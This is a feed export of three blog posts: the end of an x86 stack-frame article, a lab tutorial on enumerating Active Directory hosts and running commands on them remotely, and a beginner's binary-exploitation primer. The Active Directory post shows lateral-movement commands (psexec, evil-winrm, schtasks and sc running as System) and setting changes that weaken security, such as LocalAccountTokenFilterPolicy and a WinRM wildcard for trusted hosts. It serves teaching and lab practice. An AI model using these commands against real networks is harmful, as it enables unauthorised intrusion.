push   0x2 
push   0x1
call   80483fb &lt;function_b&gt;

```

These instructions send two integers as parameters onto the stack and roll out the red carpet, with the `call` instruction ushering the execution to the specified address while keeping the return address on standby.

![](/content/images/2023/02/parameters.png)

Viewing from top to bottom, it shows how the arguments and return address are placed on the stack.

## Prologue Unveiled: Crafting the Frame with Grace

The prologue is the opening act, featuring instructions that tweak register values to create the function&apos;s frame. It&apos;s like the function&apos;s backstage pass:

```nasm
; prologue

push    ebp                                     
mov     ebp, esp   

```

Here, the instructions gracefully push the current `ebp` value into the limelight and set the stage for a new function frame based on the stack top.

![](/content/images/2023/02/prologue.png)

Stack sample once the prologue of a function has been performed
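One detail worth noting: when the function declares local variables, the prologue usually reserves room for them right after setting up `ebp`, by moving the stack top down (the size here is illustrative):

```nasm
; prologue with space for locals

push    ebp            ; save the caller&apos;s frame pointer
mov     ebp, esp       ; new frame starts at the current stack top
sub     esp, 0x8       ; reserve 8 bytes, e.g. two 4-byte locals

```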

## Finale Choreography: The Artful Epilogue of a Function

As the final curtain gracefully descends, the epilogue steps into the limelight, guiding our program towards closure with these meticulous instructions:

```nasm
; epilogue

leave
ret

```

Now, let&apos;s pull back the curtain to reveal the inner workings of the leave instruction—it&apos;s akin to a carefully orchestrated set of moves:

```nasm
mov esp, ebp  
pop ebp       

```

In this encore performance, the leave instruction takes a bow by gracefully updating the stack top, aligning it with the value of `ebp` from the function that just concluded its act. Envision the backstage crew tidying up the set, ensuring every register and memory space returns to its initial state. Following this choreography, the pop instruction steps in, updating the value of `ebp` to the one stored in the prologue—a changing of the guard between functions.

![](/content/images/2023/02/leaveinstruction.png)

Sample leave instruction

On another note, the ret instruction assumes the role of the final bow in this symphony of instructions. It elegantly pops the return address off the stack, placing it in `eip` like the closing note of a musical piece. As the curtain falls, it also orchestrates the update of `esp` to reflect the new stack top, ensuring a seamless transition to the program&apos;s next act.

A key note to highlight: Once the caller function takes its final bow and exits the stage, `esp` undergoes yet another transformation, a dance routine dictated by the number of parameters graciously accepted by the function. For a visual, consider this code excerpt:

```nasm
call 80483fb
add  esp, 0x8

```

In this ballet, two integers, each occupying 4 bytes, gracefully ascend from the stack—a farewell gift from the calling function to the one that shared the limelight.

![](/content/images/2023/02/retinstruction.png)

Epilogue and unstacking function parameters

# Conclusion

As the curtain falls on our exploration of assembler functions, we reflect on the harmonious interplay of bytes and registers that brings program execution to life. These functions, akin to lead actors, leave behind an elegant and meticulous imprint on the stack. Remember that behind each execution lies a precise choreography defining the rhythm of the code, a dance that transforms the seemingly complex into a symphony of understanding.

# References

[Introducción · Guía de exploits](https://fundacion-sadosky.github.io/guia-escritura-exploits/buffer-overflow/1-introduccion.html)</content:encoded><author>Ruben Santos</author></item><item><title>Mastering Windows Remote Secrets: Techniques and Tools for Unveiling Hidden Realms</title><link>https://www.kayssel.com/post/active-directory-3-windows-computers</link><guid isPermaLink="true">https://www.kayssel.com/post/active-directory-3-windows-computers</guid><description>Explore Windows machines in Active Directory: From LDAP insights to SMB mastery, remote access tools like PsExec, Python&apos;s pypsexec, and WinRM empower seamless control and discovery within the Windows domain landscape</description><pubDate>Fri, 03 Feb 2023 12:15:20 GMT</pubDate><content:encoded># **Introduction: Unveiling Windows Secrets Remotely**

Embarking on the vast domain of Windows requires not only knowledge but also the right tools to uncover its secrets. In this article, you will dive into techniques and tools that will unlock the doors of Windows machines remotely, granting you access to valuable information and empowering you to execute commands with finesse.

From exploration through LDAP to deploying advanced techniques such as SMB usage and accessing through RDP, each section of this article will guide you through a discovery journey, revealing methods that go beyond the conventional. Get ready to become a master of remote connection in the Windows universe.

# Unlocking Windows Machine Secrets: A Journey through LDAP, NBTNS, and SMB

## LDAP exploration

Ever wondered how to unlock a treasure trove of information in an Active Directory domain? Well, one way is to dive into the NTDS (Active Directory database) using the LDAP (Lightweight Directory Access Protocol) protocol. It&apos;s like having a secret key to unlock doors, but in this case, you need a domain user to make it work. Imagine your Kali machine as a detective, equipped with the ldapsearch tool, sniffing out valuable clues.

```bash
┌──(rsgbengi㉿kali)-[~]
└─$ ldapsearch -H ldap://192.168.253.130 -x -LLL -W -D &quot;vaan@shadow.local&quot; -b &quot;dc=shadow,dc=local&quot; &quot;(objectclass=computer)&quot; &quot;DNSHostName&quot; &quot;OperatingSystem&quot;
Enter LDAP Password: 
dn: CN=DC-SHADOW,OU=Domain Controllers,DC=SHADOW,DC=local
operatingSystem: Windows Server 2019 Standard Evaluation
dNSHostName: DC-SHADOW.SHADOW.local

dn: CN=PC-BERU,CN=Computers,DC=SHADOW,DC=local
operatingSystem: Windows 10 Enterprise Evaluation
dNSHostName: PC-BERU.SHADOW.local

```

## **Navigating with NBTNS**

Picture this: you&apos;re on a quest to discover Windows machines, but don&apos;t have a domain user handy. Fear not! Enter the Netbios Name Services protocol (NBTNS), your trusty sidekick in this journey. Windows machines usually keep port 137 wide open, like a welcoming door. It&apos;s like having a window into their world, and guess what? Most of them don&apos;t even bother with a firewall on this port.

The beauty of NBTNS lies not just in its accessibility, but also in its power to translate IP addresses into hostnames. It&apos;s like having a translator in a foreign land. To embark on this discovery adventure, scripts like [nbtscan](https://github.com/charlesroelli/nbtscan) (also [packaged in Kali](https://www.kali.org/tools/nbtscan/)) become your virtual tour guides, revealing the hidden gems in the Windows landscape.

```bash
┌──(rsgbengi㉿kali)-[~]
└─$ nbtscan 192.168.253.0/24
Doing NBT name scan for addresses from 192.168.253.0/24

IP address       NetBIOS Name     Server    User             MAC address      
------------------------------------------------------------------------------
192.168.253.130  DC-SHADOW        &lt;server&gt;  &lt;unknown&gt;        42:5a:97:56:1e:f6
192.168.253.131  PC-BERU          &lt;server&gt;  &lt;unknown&gt;        1e:3a:58:0b:95:35
192.168.253.255	Sendto failed: Permission denied

```

## **Exploring SMB Magic**

Let&apos;s talk about unlocking the full potential of Windows machines in your domain, and my favorite method involves dancing with the Server Message Block (SMB) protocol. Picture it as a backstage pass to a concert; it uses port 445 and opens the door to a wealth of information. The secret sauce here? The NTLM authentication protocol, which adds an extra layer of access. Feel free to leverage tools like Nmap for this journey.

```bash
┌──(rsgbengi㉿kali)-[~]
└─$ sudo nmap --script smb-os-discovery 192.168.253.131  
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-28 12:10 CET
Nmap scan report for 192.168.253.131
Host is up (0.000086s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 1E:3A:58:0B:95:35 (Unknown)

Host script results:
| smb-os-discovery: 
|   OS: Windows 10 Enterprise Evaluation 19045 (Windows 10 Enterprise Evaluation 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: PC-BERU
|   NetBIOS computer name: PC-BERU\x00
|   Domain name: SHADOW.local
|   Forest name: SHADOW.local
|   FQDN: PC-BERU.SHADOW.local
|_  System time: 2023-01-28T12:10:12+01:00

Nmap done: 1 IP address (1 host up) scanned in 1.45 seconds

```

Additionally, we can employ Python, specifically the [Impacket](https://github.com/fortra/impacket) library, to get intel from the machines. The [SMBConnection](https://github.com/fortra/impacket/blob/master/impacket/smbconnection.py) class acts like your virtual tour guide, offering a backstage pass to information like operating systems and DNS names.

```python
In [1]: from impacket.smbconnection import SMBConnection
In [2]: conn = SMBConnection(&quot;192.168.253.131&quot;, &quot;192.168.253.131&quot;)
In [3]: conn.login(&quot;beruinsect&quot;, &quot;Password2&quot;)
In [4]: conn.getServerOS()
Out[4]: &apos;Windows 10.0 Build 19041&apos;

```

Important tip: ensure your Domain Controller is up before launching connections; otherwise, the login may fail. Also, note that the Impacket class reveals more detail if we negotiate SMB version 1.

```python
In [1]: from impacket.smbconnection import SMBConnection, SessionError
In [2]: from impacket.smb import SMB_DIALECT
In [3]: conn = SMBConnection(&quot;192.168.253.131&quot;, &quot;192.168.253.131&quot;, preferredDialect=SMB_DIALECT)
In [4]: conn.login(&quot;vaan&quot;, &quot;Password1&quot;)
In [5]: conn.getServerOS()
Out[5]: &apos;Windows 10 Enterprise Evaluation 19045&apos;

```

In the code above, notice how we pin down the exact Windows 10 build in use. The &quot;preferredDialect&quot; parameter is how we request a specific SMB version during the connection. If you peek into the Impacket SMB file, you&apos;ll catch references to &quot;NT LM 0.12,&quot; the dialect string that marks the SMBv1 era; tools like nmap use the same string to flag it.

![](/content/images/2023/01/image-87.png)

Identify SMBv1 enabled computers with nmap

![](/content/images/2023/01/image-88.png)

How impacket names SMBv1

If you&apos;re looking to add some flavor to your exploration with SMBv1, take a detour to &apos;Turn Windows Features on or off &gt; SMB 1.0/CIFS File Sharing Support.&apos; This move is like tuning your instruments before a concert, preparing your machines for a rock-and-roll experience. Get ready to make them sing as you dive into the SMBv1 world!

![](/content/images/2023/01/image-85.png)

How to enable SMBv1

# Windows Machine Interaction: Remote Access Strategies and Tools

## **Unleashing Psexec Magic on Windows Machines**

Let&apos;s delve into a personal favorite: Psexec, the wizard&apos;s wand for remote code execution on Windows machines. This tool weaves its magic by sending your desired commands through Remote Procedure Call (RPC) and orchestrating the exchange of command input and output via SMB pipes. It may sound a bit mysterious, but fear not—I&apos;ll unravel the intricacies of these protocols in future articles.

**Before We Begin:** To perform Psexec on a machine, here&apos;s the golden rule: you must wield the powers of an administrator. Without these credentials, the gates to remote command execution remain firmly shut.

```bash
┌──(rsgbengi㉿kali)-[~]
└─$ impacket-psexec Administrator@192.168.253.130  
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Requesting shares on 192.168.253.130.....
[*] Found writable share ADMIN$
[*] Uploading file HHRhnpKK.exe
[*] Opening SVCManager on 192.168.253.130.....
[*] Creating service xAaH on 192.168.253.130.....
[*] Starting service xAaH.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32&gt;

```

### **Empowering Python: Psexec at Your Fingertips**

Now, let&apos;s bring the power of Python into the realm of Psexec with the [pypsexec](https://github.com/jborean93/pypsexec) module. It&apos;s like having a magical wand to implement remote code execution functionality. Witness the simplicity in action with this example:

```bash
In [1]: from pypsexec.client import Client
In [2]: c = Client(&quot;192.168.253.131&quot;, username=&quot;Administrator&quot;, password=&quot;P@$$w0rd!&quot;)
In [3]: c.connect()
In [4]: c.create_service()
In [5]: c.run_executable(&quot;cmd.exe&quot;, arguments=&quot;/c echo Hello World&quot;)
Out[5]: (b&apos;Hello World\r\n&apos;, b&apos;&apos;, 0)
In [6]: c.run_executable(&quot;cmd.exe&quot;, arguments=&quot;/c whoami.exe&quot;)
Out[6]: (b&apos;shadow\\administrator\r\n&apos;, b&apos;&apos;, 0)

```

### **Navigating Psexec Woes on Windows 10**

In the magical world of Windows 10, Psexec might throw a curveball, manifesting as the dreaded &quot;Access Denied&quot; error. Fear not, for a simple incantation can dispel this enchantment: create a registry value named &quot;LocalAccountTokenFilterPolicy&quot; and set it to 1.

```powershell
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

```

By running this command, we unlock the path to seamless Psexec execution on Windows 10 machines. The doors swing open, and you can now traverse the mystical realms without hindrance.

![](/content/images/2023/01/image-89.png)

Being able to perform psexec in Windows 10 

# **WinRM: Gateway to Remote Windows Management**

Behold WinRM, the beacon of remote command execution in the Windows realm! WinRM, short for Windows Remote Management, is a built-in utility ready to serve. By default, it listens on TCP port 5985 for HTTP (5986 for HTTPS). While it graciously opens its doors on Windows servers, workstations like Windows 10 may keep it hidden, requiring a gentle summons.
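
Before summoning evil-winrm, it can be worth a quick check that the listener is actually reachable. A dependency-free sketch (the function name is mine; the IP is the lab Domain Controller from these examples):

```python
import socket

def tcp_port_open(host, port, timeout=2.0):
    # Attempt a full TCP connect; True means something is listening.
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# WinRM defaults: 5985 for HTTP, 5986 for HTTPS
# tcp_port_open("192.168.253.130", 5985)
```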

To connect to our Domain Controller, envision your Kali machine as a conjurer wielding the [evil-winrm](https://github.com/Hackplayers/evil-winrm) tool:

```bash
┌──(rsgbengi㉿kali)-[~/tools]
└─$ evil-winrm -i 192.168.253.130 -u administrator -p &apos;P@$$w0rd!&apos; 

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents&gt; whoami
shadow\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents&gt; 

```

In this mystical encounter, we use evil-winrm to establish a connection. The Windows console bows before our commands, echoing the identity of the administrator—truly a moment of triumph.

## **Empowering WinRM: Enabling the Unseen Forces**

Unlocking the potential of WinRM requires a ritual, especially on workstations like Windows 10. Execute the following commands, invoking the PowerShell spirits:

```powershell
PS C:\Windows\system32&gt; Enable-PSRemoting -Force
PS C:\Windows\system32&gt; winrm quickconfig -transport:https
PS C:\Windows\system32&gt; Set-Item wsman:\localhost\client\trustedhosts *
PS C:\Windows\system32&gt; Restart-Service WinRM

```

As the unseen forces stir, WinRM emerges, ready to heed your commands. To verify this mystical transformation, wield the &quot;Test-WSMan&quot; tool. If it responds with protocol information and the allowed version, the spell has been cast successfully.

![](/content/images/2023/01/image-90.png)

Verify that a machine supports WinRM

## **WinRS: Bridging Realms from Windows Machines**

Enter WinRS, a gateway connecting Windows machines across the digital expanse! If you find yourself on a Windows machine, yearning to traverse its vast territories, WinRS is your trusty guide.

```powershell
winrs -r:http://192.168.253.130 -u:&lt;adminuser&gt; -p:&apos;&lt;password&gt;&apos; cmd

```

![](/content/images/2023/01/image-92.png)

Using winrs to connect to other Windows machines

With this incantation, WinRS beckons from your Windows machine, communicating with the remote realm at 192.168.253.130. The response echoes the esteemed Administrator, a testament to the seamless connection forged.

## **RDP: Unlocking Windows Realms Remotely**

Picture this: a remote gateway into the heart of Windows machines—the Remote Desktop Protocol (RDP). Whether you wield the default mstsc client on a Windows machine or opt for Linux companions like Remmina, the path to Windows domains is at your fingertips.

&lt;details&gt;
&lt;summary&gt;On Windows:&lt;/summary&gt;

```powershell
mstsc /d:domain /u:&lt;username&gt; /p:&lt;password&gt; /v:&lt;IP&gt;

```
&lt;/details&gt;


&lt;details&gt;
&lt;summary&gt;For Linux adventurers embracing the xfreerdp:&lt;/summary&gt;

```bash
xfreerdp /d:domain /u:&lt;username&gt; /p:&lt;password&gt; /v:&lt;IP&gt;

```
&lt;/details&gt;


With RDP as your key, the digital gates swing open, revealing the Windows desktop. Navigate the graphical expanse remotely, unlocking the potential for seamless interactions.

## **Beyond Boundaries: AT and Schtasks**

In the realm of Windows command execution, AT and Schtasks emerge as tools of ancient wisdom. While AT, considered obsolete post-Windows 8, can still be summoned for remote command execution:

```cmd
at \\&lt;REMOTE-MACHINE&gt; HH:MM &lt;PROGRAM&gt;

```

Its successor, Schtasks, offers equal prowess for commanding both local and remote executions:

```cmd
schtasks /create /tn &lt;TASK-NAME&gt; /tr &lt;PROGRAM-TO-EXECUTE&gt; /sc once /st 00:00 /S &lt;REMOTE-PC&gt; /RU System

schtasks /run /tn &lt;TASK-NAME&gt; /S &lt;REMOTE-PC&gt;

```

Engage these tools judiciously, unraveling the ancient threads of command execution across Windows domains.
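
The two-step create/run flow above is easy to wrap if you script it often. Here is a sketch that just builds the argument lists (the function names are mine; on a Windows host you would hand the lists to subprocess.run):

```python
def schtasks_create(task_name, program, remote_pc, start_time="00:00"):
    # Mirrors: schtasks /create /tn NAME /tr PROGRAM /sc once /st 00:00 /S PC /RU System
    return ["schtasks", "/create", "/tn", task_name, "/tr", program,
            "/sc", "once", "/st", start_time, "/S", remote_pc, "/RU", "System"]

def schtasks_run(task_name, remote_pc):
    # Mirrors: schtasks /run /tn NAME /S PC
    return ["schtasks", "/run", "/tn", task_name, "/S", remote_pc]
```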

![](/content/images/2023/02/image.png)

Sample execution of schtasks

## **SC: Initiating Services Remotely**

In the arsenal of remote manipulation, SC stands tall. With this tool, service initiation becomes a mere whisper:

```cmd
sc \\&lt;Hostname&gt; create &lt;Name of the service&gt; binpath= &quot;cmd.exe /c path&quot;
sc \\&lt;Hostname&gt; start &lt;Name of the service&gt;

```

![](/content/images/2023/02/image-2.png)

Sample execution of SC

![](/content/images/2023/02/image-1.png)

Sample of notepad background execution

Unleash SC strategically, and witness the initiation of services that echo across the Windows expanse.

# **Conclusions: Unleashing Remote Power in the Windows Realm**

As you conclude this journey, you have unlocked an arsenal of techniques and tools that grant you the power to explore and control Windows machines remotely. Whether through LDAP reconnaissance, SMB protocol mastery, or sophisticated RDP maneuvers, you now possess the knowledge to navigate the intricate landscape of Windows with confidence and expertise. The realm is yours to command.

# References

[Attacking Active Directory: 0 to 0.9 | zer1t0](https://zer1t0.gitlab.io/posts/attacking_ad/)

[WinRM Penetration Testing - Hacking Articles](https://www.hackingarticles.in/winrm-penetration-testing/)</content:encoded><author>Ruben Santos</author></item><item><title>Embarking on the Exploration: Fundamentals of Binary Exploitation on Linux</title><link>https://www.kayssel.com/post/explotation-1-assembly</link><guid isPermaLink="true">https://www.kayssel.com/post/explotation-1-assembly</guid><description>Introduction Embarking on a journey to unravel the intricacies of binary exploitation techniques, I&apos;m excited to share my experiences in this series. While it&apos;s admittedly one of the trickier topics to tackle, especially for beginners, I&apos;ve decided to take the plunge in 2023! 😅 My guide of choic...</description><pubDate>Fri, 27 Jan 2023 10:12:53 GMT</pubDate><content:encoded># Introduction

Embarking on a journey to unravel the intricacies of binary exploitation techniques, I&apos;m excited to share my experiences in this series. While it&apos;s admittedly one of the trickier topics to tackle, especially for beginners, I&apos;ve decided to take the plunge in 2023! 😅 My guide of choice is the remarkable [Nightmare](https://guyinatuxedo.github.io/) course, supplemented by additional resources listed below. So, let&apos;s dive into the fascinating world of binary exploitation!

# The Compilation Process

The compilation process serves as the bridge, translating high-level language code like C into the machine&apos;s language—binary code. This binary language is a collection of instructions or operation codes (opcodes), essentially the commands that the processor follows and stores in memory.

![](/content/images/2023/01/conversiontypes.png)

Different ways of saying the same thing

To make these instructions more readable, we opt for a hexadecimal representation rather than the binary format. This switch to hexadecimal isn&apos;t just a technical choice; it&apos;s a practical one, enhancing the ease with which developers and analysts can work with and understand these instructions during the debugging or analysis stages.

![](/content/images/2023/01/memory.png)

Memory content

Now, let&apos;s talk about the fascinating evolution of code during this compilation journey. The high-level code transforms into something called assembly code. Think of assembly code as the machine&apos;s language, but presented in a way that we humans can grasp. It&apos;s like a bridge between our human-friendly code and the machine&apos;s binary instructions.

This brings us to the next step: assembling. It&apos;s the magical process where assembly code gets translated into opcodes, the fundamental building blocks of the executable program. This is where the transformation from readable instructions to the machine-understandable language truly takes shape.

![](/content/images/2023/01/compile-1-.png)

The compilation process

Various architectures operate with distinct assembly languages. In my exploration, I&apos;ll be delving into 64-bit and 32-bit ELF (Executable and Linkable Format) binaries. Adding to the richness of this journey, there are two primary assembler syntaxes in play: Intel and AT&amp;T.

Let&apos;s take a moment to appreciate the nuance between these syntaxes. In the Intel syntax, the target register takes the lead, listed first, while the source register follows—essentially the reverse of the AT&amp;T syntax. It&apos;s a subtle yet crucial distinction that sets the tone for how we communicate with the processor in these different assembly languages. This diversity adds a layer of complexity to the understanding of these architectures, making the exploration all the more intriguing!

# Registers

Registers, in the realm of computing, act as dedicated spaces where the processor can store both memory addresses and data needed to execute instructions—picture them as the local variables of the processor. Within this intricate world, some registers serve specific functions, while others maintain a more general nature. The upcoming sections will delve into a detailed exploration of these registers, shedding light on their distinctive roles and functionalities as we progress through the article.

![](/content/images/2023/01/registros-2-.png)

Registers summary

In the realm of x64 architectures, registers take on the role of handling function arguments. Each register has its designated purpose in this symphony:

-   rdi: First Argument
-   rsi: Second Argument
-   rdx: Third Argument
-   rcx: Fourth Argument
-   r8: Fifth Argument
-   r9: Sixth Argument

However, the scenario shifts when we dive into x32 architectures. Here, the stack becomes the messenger, carrying the burden of passing arguments to functions. It&apos;s worth noting that in languages like C, non-void functions return a value. This returned value plays a pivotal role, with rax taking on the responsibility in x64 architectures and eax assuming the mantle in x32 architectures. It&apos;s a dance of registers and stacks, orchestrating the flow of information and results in the intricate world of function calls.

## Instruction Pointer (rip, eip)

Meet the Instruction Pointer, a crucial register that holds the key to the next chapter in the processor&apos;s script. Every time an instruction takes center stage, this register updates its value, pointing eagerly to the next instruction in line. Its journey involves increments, dictated by the size of the executed instruction.

Let&apos;s break it down with an example: consider the instruction &quot;add eax, 0x1,&quot; a snippet of elegance stored in memory as &quot;83 C0 01,&quot; occupying a humble 3 bytes. Post-execution, the Instruction Pointer steps forward by 3, gracefully guiding the processor to the next act in this computational ballet. It&apos;s a dance of bytes and pointers, choreographed by the rhythm of instructions.
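
You can sanity-check that arithmetic from Python, using the opcode bytes quoted above (the starting address here is invented):

```python
# "add eax, 0x1" assembles to the bytes 83 C0 01
opcode = bytes.fromhex("83C001")

rip = 0x401000                 # hypothetical current instruction address
rip_next = rip + len(opcode)   # the pointer advances by the instruction size

assert len(opcode) == 3
assert rip_next == 0x401003
```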

![](/content/images/2023/01/eipregister.png)

## Size of registers

In the evolving landscape of computing architectures, a notable distinction between x32 and x64 systems emerges in the realm of register sizes. Picture registers as storage units for the processor, holding vital information for computation.

In the x32 realm, these registers have a cap at 4 bytes, reflecting the technology of its time. However, as we step into the more advanced x64 architectures, the registers double in size, boasting an expansive 8 bytes of storage capacity. This augmentation in register size signifies a technological leap, equipping processors with enhanced capabilities and paving the way for more sophisticated computing endeavors. It&apos;s a tangible manifestation of progress in the ever-evolving world of technology.

![](/content/images/2023/01/size-1.png)

Registers Size

As we navigate through this exploration, the terms &quot;word,&quot; &quot;dword,&quot; and &quot;qword&quot; will make frequent appearances, each carrying its own significance in the language of bytes.

In our lexicon, a &quot;word&quot; encapsulates 2 bytes, forming a compact unit of data. Stepping up in size, a &quot;dword&quot; extends to 4 bytes, providing a more substantial chunk of information. And finally, at the zenith of this byte hierarchy, a &quot;qword&quot; commands a generous 8 bytes, offering an expansive canvas for data storage.

These terms serve as our linguistic tools, allowing us to articulate and navigate the intricate tapestry of data in the digital realm. So, as we encounter &quot;words,&quot; &quot;dwords,&quot; and &quot;qwords,&quot; let&apos;s appreciate the nuanced palette they bring to our understanding of data sizes.
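
Python&apos;s struct module speaks the same dialect, which makes these sizes easy to verify:

```python
import struct

# word = 2 bytes, dword = 4 bytes, qword = 8 bytes
assert struct.calcsize("=H") == 2   # word
assert struct.calcsize("=I") == 4   # dword
assert struct.calcsize("=Q") == 8   # qword
```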

# The stack

Now, let&apos;s shine a spotlight on the stack—a dynamic region in the memory landscape that plays a pivotal role in every process. Think of the stack as a backstage crew, orchestrating data management with a Last In, First Out (LIFO) approach.

To interact with this backstage maestro, we employ two fundamental instructions: &quot;push&quot; and &quot;pop.&quot; &quot;Push&quot; gracefully adds elements to the stack, creating a neatly organized stack of data. Conversely, &quot;pop&quot; takes a bow as it elegantly removes elements, revealing the most recently added data.

Why does the stack take center stage? It serves as a temporary haven for data, housing everything from local variables and function parameters to return addresses. This intricate dance of push and pop ensures a seamless flow of information, a choreography vital to the performance of each process. It&apos;s the backstage magic that keeps the show running smoothly.
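
The LIFO choreography maps directly onto a Python list, with append playing the role of push:

```python
stack = []

# push: each value lands on top of the stack
stack.append(0x10)
stack.append(0x20)
stack.append(0x30)

# pop: the most recently pushed value comes off first (LIFO)
assert stack.pop() == 0x30
assert stack.pop() == 0x20
assert stack == [0x10]
```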

![](/content/images/2023/01/stack-1.png)

## Stack Pointer (rsp, esp)

Now, let&apos;s unveil the maestro behind the scenes—the Stack Pointer (rsp, esp). This register stands as the guardian of the stack, keeping track of the memory address at the very summit, where the last element resides.

Picture this: when a new member enters the stage through a &quot;push&quot; instruction, the Stack Pointer updates its address, ensuring it points to the newly welcomed guest. On the flip side, if the time comes for a graceful exit via a &quot;pop&quot; instruction, the Stack Pointer orchestrates the removal of the topmost element, storing its value in the designated register. As this dance unfolds, the Stack Pointer gracefully adjusts its address, synchronizing with the ebb and flow of the stack.

In the world of 32-bit architecture, this dance is captured in a visual spectacle, showcasing the interplay between instructions and the Stack Pointer. It&apos;s a mesmerizing ballet where addresses and values waltz in harmony, bringing order to the dynamic stage of memory management

![](/content/images/2023/01/push_pop.png)

Push and Pop instructions

Continuing the exploration of this memory-endian dance, let&apos;s delve into why &quot;push 0x100&quot; struts onto the stage as &quot;00 01 00 00&quot; in little-endian fashion. The magic lies in the computer&apos;s chosen method of storing data in memory.

Picture it like a carefully choreographed routine—little-endian style. The smallest memory address eagerly embraces the least significant byte, leading the procession up to the grand finale with the most significant byte taking its place.

This dance is a deliberate choice, optimizing memory storage and retrieval for the intricate performances that unfold within the computer&apos;s circuits. It&apos;s a reminder that in the digital realm, even the arrangement of bytes follows a choreography designed for efficiency and elegance.
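
You can reproduce the &quot;00 01 00 00&quot; layout from Python:

```python
value = 0x100

# Little-endian: least significant byte at the lowest address
little = value.to_bytes(4, "little")
assert little.hex() == "00010000"   # matches the "00 01 00 00" above

# Big-endian for contrast: most significant byte first
big = value.to_bytes(4, "big")
assert big.hex() == "00000100"
```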

![](/content/images/2023/01/littlevsbig.png)

Little-endian vs Big-endian

Now, let&apos;s shed light on how memory addresses gracefully guide us to the various cells adorned with data. Imagine this as a visual voyage, and to make it more accessible, let&apos;s turn to a simple yet illuminating diagram:

![](/content/images/2023/01/hexa.png)

memory address to data relation

In this visual narrative, each memory address serves as a map coordinate, pointing to a specific cell where data is elegantly stored. It&apos;s akin to navigating a grid, where the address acts as a guide, leading us to the precise location of the digital treasures.

This visual metaphor is our compass, helping us decipher the intricate language of memory addresses and their correlation with the rich tapestry of data. So, as we traverse the digital landscape, let this diagram be our trusted guide in understanding the spatial poetry of memory.

# Instructions

Let&apos;s step into the realm of instructions—a symphony of commands that govern the dance of binary code. While we&apos;ve touched on the graceful movements of &quot;push&quot; and &quot;pop,&quot; there&apos;s a whole ensemble of instructions awaiting our exploration when analyzing assembly code.

## Mov instruction

Meet the maestro, the &quot;mov&quot; instruction, orchestrating the art of data movement between registers. In its simplest form, it elegantly transfers data from the ebx register to the eax register, a seamless exchange in the processor&apos;s memory ballroom.

```nasm
mov eax, ebx
```

![](/content/images/2023/01/movinstruction-5-.png)

Sample of mov instruction

Yet, &quot;mov&quot; possesses a more nuanced choreography. It can also perform a pas de deux with data by employing what we call &quot;dereference.&quot; This term unveils a dance with memory addresses, guided by pointers. Imagine a pointer as a curator, pointing to data in the vast museum of memory. The syntax for this intricate dance is demonstrated below:

```nasm
mov eax, [ebx]
mov [ebx], eax

```

This dance of &quot;mov&quot; with dereference mirrors the way high-level languages access array data (like array\[3\]). It&apos;s a blend of elegance and functionality, enriching our understanding of how data twirls and pirouettes in the language of assembly.
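
To see the two dereference forms in action without firing up a debugger, here is a toy model with memory as a bytearray (the address and value are invented):

```python
# Toy model: 16 bytes of memory, registers held in a dict
memory = bytearray(16)
regs = {"eax": 0, "ebx": 8}          # ebx holds an address (offset 8)

memory[8:12] = (0xDEADBEEF).to_bytes(4, "little")

# mov eax, [ebx]  -- load the dword that ebx points to
regs["eax"] = int.from_bytes(memory[regs["ebx"]:regs["ebx"] + 4], "little")
assert regs["eax"] == 0xDEADBEEF

# mov [ebx], eax  -- store eax back to the address held in ebx
memory[regs["ebx"]:regs["ebx"] + 4] = regs["eax"].to_bytes(4, "little")
assert memory[8:12].hex() == "efbeadde"   # little-endian byte order in memory
```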

![](/content/images/2023/01/movinstruction-4-.png)

Sample of dereference

## Lea instruction

Introducing the &quot;lea&quot; instruction—a maestro specializing in loading memory addresses onto the stage. With a syntax reminiscent of a well-rehearsed routine:

```nasm
lea    eax,[ebx-0x4]

```

In the dance of assembly code, &quot;lea&quot; gracefully takes the memory address provided by the source register (here, ebx), twirls it with a specified offset (-0x4), and elegantly places it into the destination register (eax).

For those familiar with high-level languages like C, envision &quot;lea&quot; as a virtuoso akin to &quot;&amp;&quot; in function. It&apos;s a subtle yet powerful move, akin to taking the address of a variable in C, revealing the intricacies of memory navigation in the world of assembly.

![](/content/images/2023/01/leainstruction-1.png)

Sample of lea instruction

## Add instruction

Enter the &quot;add&quot; instruction—a virtuoso in the arithmetic ballet of assembly code. With a simple yet impactful syntax:

```nasm
add rax, rdx

```

In this elegant move, &quot;add&quot; takes the stored values from the rax and rdx registers, orchestrates a seamless addition, and then gracefully deposits the sum into the target register, here elegantly named rax.

It&apos;s a choreography of numbers, a ballet of bits, where the addition of registers becomes a harmonious performance, enriching the computational tapestry of the processor.

![](/content/images/2023/01/addinstruction.png)

Sample of add instruction

## Sub Instruction

Now, let&apos;s welcome the &quot;sub&quot; instruction to the stage—a luminary in the arithmetic theater of assembly code. Witness its graceful syntax:

```nasm
sub eax, ebx

```

In this intricate move, &quot;sub&quot; takes center stage by subtracting the value stored in the ebx register from that in the eax register. The result of this subtraction, a dazzling numerical difference, is then delicately deposited into the target register, here embodied as eax.

It&apos;s a performance of numerical finesse, a ballet of subtraction where registers gracefully interact, leaving behind a result that resonates in the computational symphony.

![](/content/images/2023/01/subinstruction.png)

Sample of sub instruction

## Jump instructions and flags

In the intricate realm of assembly, special instructions take the stage, wielding the power to modify the instruction pointer—the maestro guiding the flow of code execution. Let&apos;s spotlight two primary categories of jump instructions: the unwavering unconditional, like &quot;jmp&quot; and &quot;call,&quot; and the nuanced conditional, such as &quot;je&quot; or &quot;jne.&quot;

![](/content/images/2023/01/jump.png)

In the ballet of conditional jumps, a crucial element steals the spotlight—meet the &quot;flags.&quot; These are housed in the special register, eflags for x32 or rflags for x64. Each bit in this register encapsulates control information, an orchestra of signals that various instructions can interpret.

